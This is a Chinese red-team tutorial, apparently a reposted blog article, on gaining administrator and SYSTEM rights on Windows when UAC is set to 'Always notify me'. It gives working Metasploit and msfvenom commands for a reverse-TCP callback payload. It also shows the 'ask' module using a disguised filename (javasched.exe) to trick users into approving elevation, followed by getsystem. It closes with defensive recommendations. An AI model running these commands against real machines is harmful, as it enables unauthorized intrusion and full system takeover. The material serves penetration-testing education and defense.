文章总结： 本文探讨在Windows最高UAC级别（Alwaysnotifyme）下进行权限提升的技术方法。当自动化UAC绕过失效时，攻击者可利用Metasploit的ask模块结合社会工程学，通过伪造可信程序名（如javasched.exe）诱导用户授权，成功获取管理员权限后再通过getsystem提升至SYSTEM权限。文章强调技术手段与用户信任滥用的组合攻击有效性，并建议防御方除启用最高UAC外，还需加强安全意识培训、限制管理员账号日常使用及部署EDR监控异常提权行为。 综合评分： 78 文章分类： 内网渗透,红队,实战经验,安全意识,渗透测试

内网渗透中的权限扩展（三）：在最高 UAC 级别下获取管理员与 SYSTEM 权限

原创

寰宇秘阁 寰宇秘阁

寰宇密阁

2026年2月10日 10:00 安徽

在一次完整的渗透测试中，取得初始访问权限只是开始。接下来的关键步骤，往往是不断提升自身权限，直到能够访问核心数据或完成既定测试目标。

在前一阶段中，我们已经介绍了在 Windows 默认 UAC 设置 下，如何通过本地 UAC 绕过模块提升权限。本篇将继续探讨另一种更贴近真实企业防护场景的情况：

当 UAC 被设置为最高安全级别（Always notify me）时，攻击者还能做什么？

⚠️ 重要声明 以下内容仅用于合法授权的安全测试、教学与防御研究。任何未授权的使用均可能违反法律法规。

一、后渗透阶段的目标回顾

一旦成功进入目标系统，后渗透阶段的常见目标包括：

• 获取管理员（Administrator）或 SYSTEM 权限
• 读取本地密码或密码哈希
• 利用凭据进行横向移动
• 最终访问关键业务数据（如财务系统）

本文假设测试人员已经满足以下前提条件：

✅ 已成功入侵目标主机 ✅ 已建立一个可用的 Meterpreter 会话

二、实验前提：Meterpreter 会话已建立

1. 启动 Metasploit 监听器

msfconsole -x "use exploit/multi/handler; \
set payload windows/x64/meterpreter/reverse_tcp; \
set LHOST 0.0.0.0; \
set LPORT 4444; \
run"

示例输出：

Started reverse TCP handler on 0.0.0.0:4444
Meterpreter session 1 opened
meterpreter >

2. 生成并投放 payload（示例）

msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=10.10.0.94 LPORT=4444\
-a x64 --platform windows \
-f exe -o shell.exe

当该程序在目标系统中被执行后，即可建立与 Metasploit 的回连通道。

三、最高 UAC 设置下的安全机制特点

为了防御自动化的 UAC 绕过攻击，Windows 提供了最高级别的 UAC 配置：

Always notify me

在该模式下：

• 所有需要管理员权限的操作都会触发弹窗
• 自动化绕过机制基本失效
• 每一次提权都必须经过用户确认

从防御角度来看，这是一种显著增强安全性的配置。

四、利用“Ask”方式请求管理员权限（需要用户交互）

虽然无法自动绕过，但在具备社会工程条件的评估场景中，仍可以请求用户授权。这正是 Metasploit 中 ask 模块的设计目的。

⚠️ 此方式依赖用户行为，本质上结合了技术手段 + 社会工程学。

1. 将当前 Meterpreter 会话置于后台

meterpreter > background

2. 使用 ask 模块请求权限

为了提高弹窗的可信度，可以指定一个“看起来正常”的文件名，例如常见的 Java 组件名称。

use exploit/windows/local/ask
set filename javasched.exe
set session 3
run

执行后，Metasploit 会提示：

UAC is Enabled, checking level...
The user will be prompted, wait for them to click 'Ok'

五、用户确认后的权限扩展流程

当模块运行时：

1. Windows 用户桌面会弹出 UAC 提示
2. 提示请求为指定文件（如 javasched.exe）授予管理员权限
3. 如果用户点击 允许 / Yes
4. 代码将以提升后的权限重新执行

系统随后会返回一个新的 Meterpreter 会话。

1. 成功获得新会话

Meterpreter session 5 opened

2. 验证当前用户身份

meterpreter > getuid
Server username: WIN10-GAZELLE01\gazelle01

3. 提升至 SYSTEM 权限

meterpreter > getsystem
got system via technique 1(Named Pipe Impersonation)

✅ 至此，测试人员已经获取 NT AUTHORITY\SYSTEM 级别的权限。

六、这种方式说明了什么问题？

即便在 最高 UAC 防护级别 下：

• 技术层面的自动提权被有效阻断
• 但如果用户拥有管理员凭据
• 且缺乏安全意识

那么攻击仍然可以通过**“请求式提权”**完成。

这类行为在真实攻击中并不少见，本质是一种：

技术手段 + 用户信任滥用 的组合攻击

七、防御视角的几点建议

从防守角度来看，本节内容反映出几个关键问题：

• ✅ 将 UAC 设置为 Always notify me 是必要的
• ✅ 但这并不能替代安全意识培训
• ✅ 管理员账号不应用于日常办公
• ✅ 普通用户不应拥有本地管理员权限
• ✅ 应结合 EDR 监控异常提权与 ask 行为

结语

在 Windows 安全体系中，UAC 并不是“万能防线”，而是一道需要用户正确参与的安全机制。

从渗透测试和防御研究的角度看，这一阶段清楚地说明了一个事实：

再高的安全配置，也抵不过一次错误的用户点击。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：寰宇密阁 寰宇秘阁 寰宇秘阁《内网渗透中的权限扩展（三）：在最高 UAC 级别下获取管理员与 SYSTEM 权限》